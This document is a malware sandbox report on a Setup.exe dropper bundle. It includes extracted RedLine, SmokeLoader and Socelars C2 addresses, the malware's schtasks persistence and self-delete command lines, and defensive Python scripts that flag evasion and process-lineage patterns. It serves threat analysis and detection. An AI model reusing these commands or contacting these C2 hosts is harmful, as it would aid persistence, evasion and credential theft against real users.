Analysis

max time kernel: 67s
max time network: 150s
platform: windows10_x64
resource: win10-en-20211014
submitted: 19/11/2021, 19:02

Static task: static1
Behavioral task: behavioral1 (Sample: Setup.exe, Resource: win7-en-20211104)

Note: the IoC resources in the signature tables below are tagged behavioral2, and the platform line above says windows10_x64 / win10-en-20211014, so the results on this page come from the Windows 10 run of the submission, not from the win7 behavioral1 task.

General

Target: Setup.exe
Size: 554KB
MD5: d9552a15a61f255df3206b63ee0383be
SHA1: 7c76e2edcf184b90d40003dac71b08e3a3ed2e8c
SHA256: 0cdd906491990c6ba9c24bdd60172057587859a8e649ba7f4b51fece9a0fdac6
SHA512: 0ce1db824d226df28177b6e5394fa1f8483333583d8332680d4cf0cfc8627a53d69c1c857b319dd200e0f38bf88d445a4289d78472fe3167cc39ae6a85f21599
Malware Config

Extracted: socelars
  C2: http://www.gianninidesign.com/

Extracted: redline
  Botnet: bbbb
  C2: 37.9.13.169:63912

Extracted: redline
  Botnet: udptest
  C2: 193.56.146.64:65441

Extracted: redline
  Botnet: 555
  C2: 91.206.14.151:64591

Extracted: smokeloader
  Version: 2020
  C2: http://membro.at/upload/
  C2: http://jeevanpunetha.com/upload/
  C2: http://misipu.cn/upload/
  C2: http://zavodooo.ru/upload/
  C2: http://targiko.ru/upload/
  C2: http://vues3d.com/upload/

Extracted: metasploit
  Payload: windows/single_exec

Three separate RedLine configurations, each with its own botnet ID and C2, were recovered, which matches the three RedLine memory hits below landing in three different processes (1072, 1724 and 312): the bundle carries three distinct RedLine builds rather than one.
Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4336 | 4732 | rundll32.exe | 122
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7020 | 4732 | rundll32.exe | 122
Two rundll32.exe instances (4336 and 7020) were started by the same WmiPrvSE.exe host (4732), i.e. something created processes through WMI. Neither pid appears in the part of the process listing shown at the end of this page.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (6 IoCs)
resource | yara_rule
behavioral2/memory/1072-259-0x00000000023A0000-0x00000000023CE000-memory.dmp | family_redline
behavioral2/memory/1724-268-0x0000000000500000-0x0000000000520000-memory.dmp | family_redline
behavioral2/memory/1072-272-0x0000000002480000-0x00000000024AC000-memory.dmp | family_redline
behavioral2/memory/312-277-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/1724-296-0x0000000000518EEE-mapping.dmp | family_redline
behavioral2/memory/312-301-0x0000000000418EFE-mapping.dmp | family_redline
In the process listing, 1072 is uw3x5UZ_x4Ps_eaCOFD55IW_.exe, while 1724 and 312 are the AppLaunch.exe instances started by 2FwGPMS0DwsAJmJt30kqxVWa.exe (1216) and n7IoPyl0GofJiCvMJ26_RxWk.exe (2352). For those two samples the RedLine code was matched inside the .NET host process, not in the dropped executable itself, so memory of the child is where the unpacked stealer lives.

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x000400000001ac0b-133.dat | family_socelars
behavioral2/files/0x000400000001ac0b-132.dat | family_socelars

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (1 IoC)
resource | yara_rule
behavioral2/memory/1572-252-0x0000000002200000-0x00000000022D5000-memory.dmp | family_vidar
PID 1572 is ZmGwCijz_aF6kekXlZOAQ8Bm.exe, the process that later removes itself with the taskkill / timeout / del chain shown in the process listing.

Downloads MZ/PE file

Executes dropped EXE (28 IoCs)
pid | Process
2264 | YIom9MplWv2EdICGV3pNwsMp.exe
512 | g0xmn6u7LbKLtk3Q_FOJkaa1.exe
2236 | D2iekO3L2Z2yXRah6Fyyo_Tq.exe
2256 | IPkZZkIpJIP4h4aZO88aFQU8.exe
1572 | ZmGwCijz_aF6kekXlZOAQ8Bm.exe
3880 | aWO3kyDWUY6qOk8aw7dUT6ep.exe
804 | PB2I64qARSFDtYJ3nobcBQFo.exe
60 | QV0IFeEZkl3FCtLgF98mEOh9.exe
1488 | e1CrrXCkZ8t_nyzdNUuoLNt_.exe
1364 | 8u0oitmhgevh1MzSaqj9ppEe.exe
360 | DllHost.exe
596 | GnYY58_zNkV7iYJyGcEVYFxH.exe
2352 | n7IoPyl0GofJiCvMJ26_RxWk.exe
1072 | uw3x5UZ_x4Ps_eaCOFD55IW_.exe
1060 | JkEAwDR9eFf1IiksFz8QTw_O.exe
600 | L9S67PdEwQEN8zxKqmVrVq_C.exe
3196 | TCmEOe83n5q_zlXj1ichAwHp.exe
2600 | ZOfaCe2gP2ntE8UsdnOMtkcn.exe
1216 | 2FwGPMS0DwsAJmJt30kqxVWa.exe
348 | gf4yL6i5_1EnGcL45rapBi4N.exe
2284 | Di68BgTKfVJrtOniWjpuFeoP.exe
1752 | tk0pJOIVedvbbDoftQOGUQGr.exe
1280 | jjJwr9ifpZzN9Q81BgUEgmtM.exe
1868 | 3fzJvJsNxh3XgOwzydSsFjvG.exe
3424 | a5fd8PV6jg7cJ2ynvQgXPvjV.exe
900 | jg1_1faf.exe
2216 | rtst1039.exe
1260 | 7IMHR70sE01sKpdv3ItQAxCA.exe
PID 360 is listed here as DllHost.exe, but in the process listing the same pid is 7IMHR70sE01sKpdv3ItQAxCA.exe, the parent of 1260; the SetThreadContext entry below also uses the DllHost.exe name for it. PID 1364 (8u0oitmhgevh1MzSaqj9ppEe.exe) does not appear in the part of the listing shown on this page.

Matches yara rule upx (4 IoCs)
resource | yara_rule
behavioral2/files/0x000400000001ac28-341.dat | upx
behavioral2/files/0x000400000001ac28-338.dat | upx
behavioral2/files/0x000400000001ac28-448.dat | upx
behavioral2/files/0x000400000001ac28-463.dat | upx
Checks BIOS information in registry (2 TTPs, 14 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Each of the following seven processes queried both \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion:
2FwGPMS0DwsAJmJt30kqxVWa.exe
TCmEOe83n5q_zlXj1ichAwHp.exe
Di68BgTKfVJrtOniWjpuFeoP.exe
3fzJvJsNxh3XgOwzydSsFjvG.exe
tk0pJOIVedvbbDoftQOGUQGr.exe
n7IoPyl0GofJiCvMJ26_RxWk.exe
QV0IFeEZkl3FCtLgF98mEOh9.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation | Setup.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Matches yara rule themida (16 IoCs)
resource | yara_rule
behavioral2/files/0x000400000001ac22-185.dat | themida
behavioral2/files/0x000400000001ac1b-182.dat | themida
behavioral2/files/0x000400000001ac1f-180.dat | themida
behavioral2/files/0x000400000001ac1f-179.dat | themida
behavioral2/files/0x000400000001ac1c-178.dat | themida
behavioral2/files/0x000400000001ac1c-177.dat | themida
behavioral2/files/0x000500000001ac07-172.dat | themida
behavioral2/files/0x000500000001ac07-171.dat | themida
behavioral2/files/0x000400000001ac1b-181.dat | themida
behavioral2/files/0x000400000001ac0d-153.dat | themida
behavioral2/files/0x000400000001ac0d-152.dat | themida
behavioral2/memory/1752-230-0x0000000001260000-0x0000000001261000-memory.dmp | themida
behavioral2/memory/2284-227-0x0000000001090000-0x0000000001091000-memory.dmp | themida
behavioral2/memory/60-215-0x0000000000180000-0x0000000000181000-memory.dmp | themida
behavioral2/memory/3196-216-0x0000000000260000-0x0000000000261000-memory.dmp | themida
behavioral2/memory/1868-238-0x0000000000AA0000-0x0000000000AA1000-memory.dmp | themida
The five processes with Themida memory matches (1752, 2284, 60, 3196, 1868) are exactly the five flagged below for NtSetInformationThreadHideFromDebugger, so the anti-debug call is most plausibly the packer's, not the payload's.

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled (7 IoCs)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA by:
Di68BgTKfVJrtOniWjpuFeoP.exe
tk0pJOIVedvbbDoftQOGUQGr.exe
3fzJvJsNxh3XgOwzydSsFjvG.exe
2FwGPMS0DwsAJmJt30kqxVWa.exe
n7IoPyl0GofJiCvMJ26_RxWk.exe
QV0IFeEZkl3FCtLgF98mEOh9.exe
TCmEOe83n5q_zlXj1ichAwHp.exe
These are the same seven processes that read the BIOS keys above.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)
The only such activity visible on this page is the pair of cdn.discordapp.com downloads performed by extd.exe in the process listing.

Looks up external IP address via web service (11 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
23 | api.db-ip.com
122 | ipinfo.io
124 | api.db-ip.com
19 | ipinfo.io
20 | ipinfo.io
137 | ip-api.com
189 | ipinfo.io
191 | api.db-ip.com
366 | ip-api.com
24 | api.db-ip.com
121 | ipinfo.io
Three different services (api.db-ip.com, ipinfo.io, ip-api.com) are contacted across eleven flows, consistent with several independent payloads each doing their own check-in.

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
pid | Process
60 | QV0IFeEZkl3FCtLgF98mEOh9.exe
3196 | TCmEOe83n5q_zlXj1ichAwHp.exe
2284 | Di68BgTKfVJrtOniWjpuFeoP.exe
1752 | tk0pJOIVedvbbDoftQOGUQGr.exe
1868 | 3fzJvJsNxh3XgOwzydSsFjvG.exe

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 360 set thread context of 1260 | 360 | DllHost.exe | 103
In the process listing both 360 and 1260 are 7IMHR70sE01sKpdv3ItQAxCA.exe: the sample starts a second copy of its own image and then rewrites the child's thread context, which is the shape of RunPE-style self-injection. The 1260 copy is the one the sandbox credits with "Executes dropped EXE".

Drops file in Program Files directory (5 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | GnYY58_zNkV7iYJyGcEVYFxH.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\inst2.exe | GnYY58_zNkV7iYJyGcEVYFxH.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe | GnYY58_zNkV7iYJyGcEVYFxH.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\rtst1039.exe | GnYY58_zNkV7iYJyGcEVYFxH.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | GnYY58_zNkV7iYJyGcEVYFxH.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(This is the sandbox's generic description for the rule; no ransomware family is identified anywhere else in this report, and the same enumeration is common in installers and stealers.)

Program crash (8 IoCs)
pid | pid_target | Process | procid_target
3404 | 1280 | WerFault.exe | 80
1256 | 1488 | WerFault.exe | 93
4184 | 1216 | WerFault.exe | 84
4208 | 2352 | WerFault.exe | 88
4376 | 1488 | WerFault.exe | 93
4664 | 1488 | WerFault.exe | 93
4908 | 1488 | WerFault.exe | 93
3440 | 1488 | WerFault.exe | 93
e1CrrXCkZ8t_nyzdNUuoLNt_.exe (1488) crashed five times; 1216 and 2352 are the two RedLine droppers, which crashed after spawning their AppLaunch.exe hosts.

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 8u0oitmhgevh1MzSaqj9ppEe.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 8u0oitmhgevh1MzSaqj9ppEe.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 8u0oitmhgevh1MzSaqj9ppEe.exe
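The BIOS, SCSI, EnableLUA and Geo\Nation reads above are individually weak signals (installers read some of them too); what makes them useful is the combination per process. The following is an added example, not part of the sandbox report or of any tool it mentions: it parses rows in the flattened "Key ... <path> <process>" form this page uses, tags each read with an evasion category, and flags processes that combine at least two categories. The sample rows are a subset copied from this report's tables; the category names and the two-category threshold are choices made for the example.

```python
import re
from collections import defaultdict

# Registry paths this report's signatures key on, mapped to the evasion category each
# read implies. BIOS and SCSI reads are sandbox/VM fingerprinting, EnableLUA is a UAC
# check, Geo\Nation is the geofence lookup. (Category names are this example's own.)
KEY_TAGS = {
    r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion": "vm-detect:bios",
    r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion": "vm-detect:bios",
    r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI": "vm-detect:scsi",
    r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA": "uac-check",
}
# The user SID varies per machine, so match the tail of the geofence key only.
GEO_NATION_RE = re.compile(r"\\Control Panel\\International\\Geo\\Nation$")

# One flattened IoC row as the report prints it: "Key <verb> <registry path> <process>".
# The process name is the last whitespace-separated token, so the path may contain spaces.
ROW_RE = re.compile(r"^Key (value queried|enumerated|opened|queried) (.+) (\S+)$")

# Rows copied from this report's BIOS, UAC, SCSI and location-settings tables (a subset).
SAMPLE_ROWS = r"""
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QV0IFeEZkl3FCtLgF98mEOh9.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QV0IFeEZkl3FCtLgF98mEOh9.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Di68BgTKfVJrtOniWjpuFeoP.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Di68BgTKfVJrtOniWjpuFeoP.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2FwGPMS0DwsAJmJt30kqxVWa.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QV0IFeEZkl3FCtLgF98mEOh9.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Di68BgTKfVJrtOniWjpuFeoP.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2FwGPMS0DwsAJmJt30kqxVWa.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tk0pJOIVedvbbDoftQOGUQGr.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8u0oitmhgevh1MzSaqj9ppEe.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8u0oitmhgevh1MzSaqj9ppEe.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8u0oitmhgevh1MzSaqj9ppEe.exe
Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Setup.exe
"""


def parse_rows(text):
    """Parse flattened IoC rows into (verb, registry path, process) tuples."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError("unparsed row: " + line)
        rows.append(m.groups())
    return rows


def profile(rows):
    """{process: {category: count}} over rows touching a key of interest; other keys are ignored."""
    prof = defaultdict(lambda: defaultdict(int))
    for _verb, key, proc in rows:
        tag = KEY_TAGS.get(key)
        if tag is None and GEO_NATION_RE.search(key):
            tag = "geofence"
        if tag is not None:
            prof[proc][tag] += 1
    return {p: dict(tags) for p, tags in prof.items()}


def flag_evasive(prof, min_categories=2):
    """Processes that combine at least `min_categories` distinct categories
    (e.g. a VM fingerprint read plus a UAC check), sorted by name."""
    return sorted(p for p, tags in prof.items() if len(tags) >= min_categories)
```

Run over the full tables of this report the rule returns the seven processes that appear in both the BIOS and EnableLUA lists; Setup.exe (geofence only) and 8u0oitmhgevh1MzSaqj9ppEe.exe (SCSI only) stay below the threshold, which is the intended behaviour for a single read that a benign installer might also perform.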
Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4864 | schtasks.exe
4816 | schtasks.exe
Both tasks are created by g0xmn6u7LbKLtk3Q_FOJkaa1.exe (512) and point at C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe, one on logon and one hourly, both with /rl HIGHEST (see the process listing for the full command lines).

Delays execution with timeout.exe (1 IoC)
pid | Process
1048 | timeout.exe

Kills process with taskkill (3 IoCs)
pid | Process
4976 | taskkill.exe
932 | taskkill.exe
5860 | taskkill.exe
4976 kills chrome.exe on behalf of PB2I64qARSFDtYJ3nobcBQFo.exe (804); 932 and the timeout above belong to the self-delete chain run by ZmGwCijz_aF6kekXlZOAQ8Bm.exe (1572). 5860 is not in the part of the process listing shown on this page.
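The schtasks, timeout and taskkill hits are all recognisable from the command lines in the process listing, so a triage script can score them without any telemetry beyond process creation events. The following is an added example, not code from the report or from any tool it names: it parses the two schtasks /create lines from this page into their switches and rates them (elevation, recurring trigger, action path), and it recognises the `taskkill /im X & timeout & del X` self-removal chain that ZmGwCijz_aF6kekXlZOAQ8Bm.exe ran. The command lines are copied verbatim from the listing; the argument splitter, switch table and the finding labels are this example's own.

```python
import re

# Command lines copied verbatim from the process listing in this report.
SCHTASKS_LOGON = r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST'
SCHTASKS_HOURLY = r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST'
SELF_DELETE_CHAIN = r'"C:\Windows\System32\cmd.exe" /c taskkill /im ZmGwCijz_aF6kekXlZOAQ8Bm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe" & del C:\ProgramData\*.dll & exit'
CHROME_KILL = r'cmd.exe /c taskkill /f /im chrome.exe'


def split_windows_args(cmdline):
    """Split on whitespace, keeping double-quoted spans together (quotes removed).
    Sufficient for schtasks/cmd lines; not a full CRT argv parser (no backslash escapes)."""
    args, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def strip_cmd_prefix(args):
    """Drop a leading `cmd.exe /c` or `cmd.exe /k` so the real command is at args[0]."""
    low = [a.lower() for a in args]
    if len(low) >= 2 and (low[0] == "cmd" or low[0].endswith("cmd.exe")) and low[1] in ("/c", "/k"):
        return args[2:]
    return args


# schtasks switches that take a value (the ones that matter for persistence triage).
SWITCHES_WITH_VALUE = {"/ru", "/rp", "/tr", "/tn", "/sc", "/rl", "/mo", "/st", "/sd"}


def parse_schtasks_create(cmdline):
    """Return {switch: value} for a `schtasks /create` line, or None if it is not one."""
    args = strip_cmd_prefix(split_windows_args(cmdline))
    if not args:
        return None
    exe = args[0].lower()
    if not (exe == "schtasks" or exe.endswith("schtasks.exe")):
        return None
    low = [a.lower() for a in args]
    if "/create" not in low:
        return None
    task, i = {}, 1
    while i < len(args):
        if low[i] in SWITCHES_WITH_VALUE and i + 1 < len(args):
            task[low[i][1:]] = args[i + 1]
            i += 2
        else:
            i += 1  # flag without a value, e.g. /f or /create
    return task


RECURRING_TRIGGERS = {"onlogon", "onstart", "minute", "hourly", "daily"}


def schtasks_findings(task):
    """Triage notes for a parsed task: elevation, re-execution trigger, action location."""
    notes = []
    if task.get("rl", "").lower() == "highest":
        notes.append("elevated:/rl HIGHEST")
    if task.get("sc", "").lower() in RECURRING_TRIGGERS:
        notes.append("persistence:/sc " + task["sc"].upper())
    action = task.get("tr", "")
    if action and not action.lower().startswith("c:\\windows\\"):
        notes.append("action outside C:\\Windows: " + action)
    return notes


def detect_self_delete(cmdline):
    """Recognise `taskkill /im <img> & timeout & del <path ending in img>`; return <img> or None.
    Stages are split on ' & ', which would mis-split a quoted path containing ' & ' (not the case here)."""
    killed, delayed, deleted = None, False, []
    for stage in re.split(r"\s&\s", cmdline):
        toks = strip_cmd_prefix(split_windows_args(stage.strip()))
        low = [t.lower() for t in toks]
        if not low:
            continue
        if low[0] == "taskkill" and "/im" in low and low.index("/im") + 1 < len(toks):
            killed = toks[low.index("/im") + 1]
        elif low[0] == "timeout":
            delayed = True
        elif low[0] == "del":
            deleted.extend(t for t in toks[1:] if not t.startswith("/"))
    if killed and delayed and any(p.lower().endswith("\\" + killed.lower()) for p in deleted):
        return killed
    return None
```

The chrome.exe kill from PB2I64qARSFDtYJ3nobcBQFo.exe deliberately does not match detect_self_delete: it has no delay and no delete, and a stealer terminating a browser to release its profile databases is a different finding from a loader erasing itself.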
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process | occurrences
3484 | Setup.exe | 2
2264 | YIom9MplWv2EdICGV3pNwsMp.exe | 62

Suspicious use of AdjustPrivilegeToken (37 IoCs)
PB2I64qARSFDtYJ3nobcBQFo.exe (804) enabled the following privileges:
SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, and the unnamed privilege LUIDs 31, 32, 33, 34 and 35 (in the standard Windows numbering these are SeTrustedCredManAccess, SeRelabel, SeIncreaseWorkingSet, SeTimeZone and SeCreateSymbolicLink).
Enabling every privilege from 2 through 35 in one go is the footprint of a blanket AdjustTokenPrivileges loop rather than a targeted request for one right.
WerFault.exe (3404) enabled: SeRestorePrivilege, SeBackupPrivilege, SeDebugPrivilege (normal for the error-reporting process collecting a crash dump).

Suspicious use of WriteProcessMemory (64 IoCs)
All 64 entries are of the form "PID 3484 wrote to memory of <target> 3484 Setup.exe <procid_target>"; the writes are the parent Setup.exe setting up each child it launches. Collapsed by target:
target pid | procid_target | writes
2264 | 69 | 2
512 | 70 | 3
2236 | 73 | 3
2256 | 72 | 2
1572 | 71 | 3
804 | 75 | 3
3880 | 74 | 3
60 | 78 | 3
596 | 90 | 3
360 | 104 | 3
2352 | 88 | 3
1072 | 91 | 3
1488 | 93 | 3
1364 | 94 | 3
600 | 89 | 3
3196 | 85 | 3
2600 | 86 | 3
1060 | 92 | 2
1216 | 84 | 3
1752 | 83 | 3
348 | 82 | 3
2284 | 81 | 3
1280 | 80 | 1 (the table is capped at 64 entries and stops here)
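Two lineage facts on this page carry most of the signal: WmiPrvSE.exe spawning rundll32.exe (the "unexpected child" signature above), and a single Setup.exe from %TEMP% launching two dozen executables out of Pictures\Adobe Films (the WriteProcessMemory table). The following is an added example, not code from the sandbox or from any tool it names: it rebuilds a parent/child tree from process-start records and applies three rules, an expected-children allowlist for sensitive system parents, a fan-out rule for droppers, and a rule for a signed runtime host (AppLaunch.exe here) started from a user-writable parent, which is where this report's RedLine memory matches landed. The pids and image paths are taken from this page; the record format, the parent pid 1000 used for the two roots, and the full rundll32.exe path are assumptions made for the example.

```python
from collections import defaultdict

# Constructed process-start records: (pid, ppid, image path). pids and images are those
# shown in this report; ppid 1000 for the two roots and the rundll32.exe path are assumed.
SAMPLE_PROCESSES = [
    (3484, 1000, r"C:\Users\Admin\AppData\Local\Temp\Setup.exe"),
    (2264, 3484, r"C:\Users\Admin\Pictures\Adobe Films\YIom9MplWv2EdICGV3pNwsMp.exe"),
    (512,  3484, r"C:\Users\Admin\Pictures\Adobe Films\g0xmn6u7LbKLtk3Q_FOJkaa1.exe"),
    (1572, 3484, r"C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe"),
    (2256, 3484, r"C:\Users\Admin\Pictures\Adobe Films\IPkZZkIpJIP4h4aZO88aFQU8.exe"),
    (804,  3484, r"C:\Users\Admin\Pictures\Adobe Films\PB2I64qARSFDtYJ3nobcBQFo.exe"),
    (1216, 3484, r"C:\Users\Admin\Pictures\Adobe Films\2FwGPMS0DwsAJmJt30kqxVWa.exe"),
    (4864, 512,  r"C:\Windows\SysWOW64\schtasks.exe"),
    (1724, 1216, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"),
    (4732, 1000, r"C:\Windows\system32\wbem\wmiprvse.exe"),
    (4336, 4732, r"C:\Windows\system32\rundll32.exe"),
    (7020, 4732, r"C:\Windows\system32\rundll32.exe"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def is_user_writable(path):
    """Paths a standard user can write to: anything under C:\\Users or ProgramData."""
    low = path.lower()
    return low.startswith("c:\\users\\") or "\\programdata\\" in low


def build_tree(procs):
    by_pid = {pid: (ppid, image) for pid, ppid, image in procs}
    children = defaultdict(list)
    for pid, ppid, _ in procs:
        children[ppid].append(pid)
    return by_pid, children


def unexpected_children(procs, expected):
    """`expected` maps a parent image name (lower-case) to the child names it may spawn;
    an empty set means the parent should spawn nothing, the sandbox's rule for WmiPrvSE."""
    by_pid, children = build_tree(procs)
    hits = []
    for ppid, kids in children.items():
        if ppid not in by_pid:
            continue  # parent not in the records (e.g. the assumed root)
        parent = basename(by_pid[ppid][1])
        allowed = expected.get(parent.lower())
        if allowed is None:
            continue
        for kid in kids:
            child = basename(by_pid[kid][1])
            if child.lower() not in allowed:
                hits.append((ppid, parent, kid, child))
    return sorted(hits)


def dropper_fanout(procs, min_children=3):
    """Parents that launch at least `min_children` executables from user-writable paths."""
    by_pid, children = build_tree(procs)
    hits = []
    for ppid, kids in children.items():
        if ppid not in by_pid:
            continue
        dropped = [k for k in kids if is_user_writable(by_pid[k][1])]
        if len(dropped) >= min_children:
            hits.append((ppid, basename(by_pid[ppid][1]), len(dropped)))
    return sorted(hits)


def runtime_host_from_user_path(procs, hosts=("applaunch.exe",)):
    """Signed runtime hosts started by a parent that lives in a user-writable path:
    the child is the likely injection target, as with pids 1724 and 312 in this report."""
    by_pid, _ = build_tree(procs)
    hits = []
    for pid, (ppid, image) in by_pid.items():
        if basename(image).lower() in hosts and ppid in by_pid and is_user_writable(by_pid[ppid][1]):
            hits.append((pid, basename(image), ppid, basename(by_pid[ppid][1])))
    return sorted(hits)
```

With real endpoint telemetry the same three functions run unchanged over (pid, ppid, image) tuples pulled from Sysmon event 1 or a Security 4688 feed; the threshold in dropper_fanout is the knob to tune against your own installers.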
Processes
(Indented by parent/child depth; the bracketed number is the depth from the original listing; "cmd:" is shown where the command line carries arguments. Note that pids such as 1832, 3880 and 6784 appear more than once: Windows reuses a pid once the earlier process has exited, so pid alone does not identify a process in this listing.)

[1] C:\Users\Admin\AppData\Local\Temp\Setup.exe
    PID 3484
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\Pictures\Adobe Films\YIom9MplWv2EdICGV3pNwsMp.exe
      PID 2264
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\Pictures\Adobe Films\g0xmn6u7LbKLtk3Q_FOJkaa1.exe
      PID 512
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        PID 4864
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        PID 4816
        - Creates scheduled task(s)
    [3] C:\Users\Admin\Documents\MqOkvc3WyMrKcIQM2zzmbsWb.exe
        PID 4800
      [4] C:\Users\Admin\Pictures\Adobe Films\rLQUtOL5YzAGb6NwWaChjRy8.exe
          PID 4604
      [4] C:\Users\Admin\Pictures\Adobe Films\eLEaclXkIz73ipO6piBphjOC.exe
          PID 5036
      [4] C:\Users\Admin\Pictures\Adobe Films\jA8HODtCFbdZvxruUz1Qst1v.exe
          PID 1832
      [4] C:\Users\Admin\Pictures\Adobe Films\oa8BchO6VxahD_f8vJDTjic6.exe
          PID 1356
      [4] C:\Users\Admin\Pictures\Adobe Films\VUmFo03BgPI48cthLstBKbwW.exe
          PID 2248
